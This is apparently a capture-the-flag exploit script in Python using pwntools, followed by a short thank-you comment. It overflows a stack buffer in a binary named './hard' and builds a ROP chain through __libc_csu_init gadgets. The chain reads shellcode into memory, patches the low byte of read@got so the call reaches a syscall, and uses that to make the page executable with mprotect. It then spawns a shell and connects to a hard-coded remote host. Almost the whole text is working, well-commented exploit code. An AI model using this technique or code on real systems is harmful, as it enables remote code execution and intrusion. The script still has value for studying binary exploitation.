#!/usr/bin/env python
from pwn import *
# pwntools target description: Linux x86-64. asm()/shellcraft and p64() below
# pick up the architecture from here.
context(arch='amd64', os='linux')

# Challenge binary: ELF(BINARY) is parsed for the GOT, process(BINARY) is used
# for a local run.
BINARY = './hard'
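def call_func(func, rdi=0, rsi=0, rdx=0):
    """Build one ROP link that calls ``*func`` with ``rdi``, ``rsi`` and ``rdx``.

    ``func`` is the address of a *pointer* to the target (e.g. a GOT slot),
    not the target itself: the chain drives what look like the two
    ``__libc_csu_init`` gadgets of a non-PIE binary (0x4005BA pops
    rbx/rbp/r12-r15; 0x4005A0 moves r13/r14/r15 into rdx/rsi/edi and does
    ``call [r12 + rbx*8]``) -- confirm against the target's disassembly.
    With rbx = 0 and rbp = 1 the gadget's loop body runs exactly once.

    Args:
        func: address holding the function pointer to call (lands in r12).
        rdi, rsi, rdx: the first three integer arguments of the call.

    Returns:
        The packed little-endian chain (``bytes`` on Python 3, ``str`` on
        Python 2): 64 bytes of gadget setup plus 56 bytes of filler, ready to
        append to an overflow payload. The next link, or the final return
        address, goes right after it.

    Caveats:
        * If the call gadget is the usual csu one it loads ``edi`` (32 bit),
          so only the low 32 bits of ``rdi`` reach the callee.
        * The 56-byte filler must match the gadget's stack cleanup after the
          call (presumably ``add rsp, 8`` + six pops = 7 qwords); a different
          gadget needs a different count.
        * Values must be non-negative and fit in 64 bits; ``struct.error`` is
          raised otherwise (pwntools' p64 raises ValueError for the same).
    """
    import struct

    csu_call = 0x04005A0   # presumed: mov rdx,r13; mov rsi,r14; mov edi,r15d; call [r12+rbx*8]
    csu_pop = 0x004005BA   # presumed: pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret

    def q(value):
        # Same encoding as pwntools' p64 for non-negative values, but stdlib
        # only and a proper bytes object on Python 3 (the original used str
        # concatenation, which breaks on Python 3 pwntools where p64 is bytes).
        return struct.pack('<Q', value)

    # Stack layout consumed by csu_pop, then the call gadget, then the 7
    # qwords the gadget pops before returning to whatever follows this link.
    chain = [
        q(csu_pop),
        q(0),         # rbx: index into the pointer table at r12
        q(1),         # rbp: loop bound, rbx+1 == rbp stops after one call
        q(func),      # r12: pointer table base -> call [func]
        q(rdx),       # r13 -> rdx
        q(rsi),       # r14 -> rsi
        q(rdi),       # r15 -> edi (32-bit)
        q(csu_call),
        b'A' * 56,    # junk for add rsp,8 + pop rbx,rbp,r12,r13,r14,r15
    ]
    return b''.join(chain)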
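def exploit(use_remote=True, host='128.199.152.175', port=10001):
    """Pop a shell on ``./hard`` via a stack overflow and a three-stage ROP chain.

    The binary is presumed non-PIE with a writable GOT (partial RELRO): every
    address below is hard-coded, and full RELRO or PIE would break the chain.
    The chain only ever "calls" ``read`` through its GOT slot and then turns
    that slot into a raw ``syscall`` with a one-byte overwrite:

      1. ``read(0, 0x601700, 0x40)`` -- store the shellcode on the data page.
      2. ``read(0, 0x60100f, 0xa)``  -- nine NULs land on 0x60100f..0x601017,
         the tenth byte (0x7e) replaces the low byte of ``read@got`` at
         0x601018. ``read`` returns 10, which is left in ``rax``.
      3. ``read(0x601000, 0x1000, 7)`` -- the "call" now jumps into the middle
         of libc's ``read`` (assumed: offset 0x..7e is its ``syscall``
         instruction -- TODO confirm against the target libc); with rax = 10
         (SYS_mprotect) that is ``mprotect(0x601000, 0x1000, 7)``.
      4. Return into 0x601700 and run the shellcode on the now RWX page.

    Args:
        use_remote: connect to ``host:port`` when true, otherwise run
            ``BINARY`` locally under pwntools.
        host, port: the remote target.

    Raises:
        ValueError: if ``read@got`` is not where the GOT patch expects it, or
            the shellcode does not fit the stage-1 read.

    Caveats (what makes this fragile):
        * Stage 2 must return exactly 10: a short read leaves a different
          syscall number in rax.
        * The 0x7e partial overwrite is libc-specific; it assumes the
          ``syscall`` inside ``read`` shares all but the low byte of its
          address with the resolved ``read``.
        * Stage 3's first argument travels through ``edi`` if the csu gadget
          is used, so it is truncated to 32 bits (0x601000 fits).
        * The three stdin reads are separated with sleeps: stdin is a stream,
          so if the shellcode and the GOT-patch bytes arrived together the
          0x40-byte read of stage 1 would swallow both.
    """
    r = remote(host, port) if use_remote else process(BINARY)
    elf = ELF(BINARY)

    shellcode_addr = 0x601700   # writable slot on the 0x601000 page; also the final return target
    got_patch_addr = 0x60100f   # 9 bytes below read@got, so the 10th byte hits its LSB
    got_patch = b'\0' * 9 + b'\x7e'
    rwx_page = 0x601000         # page holding both the GOT and shellcode_addr
    page_size = 0x1000
    prot_rwx = 7                # PROT_READ | PROT_WRITE | PROT_EXEC

    read_got = elf.got['read']
    # The whole trick rests on the 10-byte write ending exactly on read@got.
    if got_patch_addr + len(got_patch) - 1 != read_got:
        raise ValueError('GOT patch must end on read@got (0x%x); adjust got_patch_addr'
                         % read_got)

    # pwntools' execve("/bin/sh") stub replaces the hand-rolled one.
    shellcode = asm(shellcraft.amd64.sh())
    if len(shellcode) > 0x40:
        raise ValueError('shellcode (%d bytes) does not fit the 0x40-byte read'
                         % len(shellcode))

    payload = b''.join([
        b'A' * 16,   # local buffer up to the saved rbp
        b'B' * 8,    # saved rbp
        call_func(read_got, 0, shellcode_addr, 0x40),            # stage 1
        call_func(read_got, 0, got_patch_addr, len(got_patch)),  # stage 2, rax = 10
        call_func(read_got, rwx_page, page_size, prot_rwx),      # stage 3: really mprotect
        p64(shellcode_addr),                                     # stage 4
    ])

    r.send(payload)
    sleep(1)
    r.send(shellcode)       # consumed by stage 1
    sleep(1)
    r.sendline(got_patch)   # stage 2 reads only the first 10 bytes; the newline stays buffered
    r.interactive()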
# Script entry point: importing this module (e.g. to reuse call_func) does not
# fire the exploit.
if __name__ == "__main__":
    exploit()
ghost commented Apr 14, 2017

thank you very much. :)
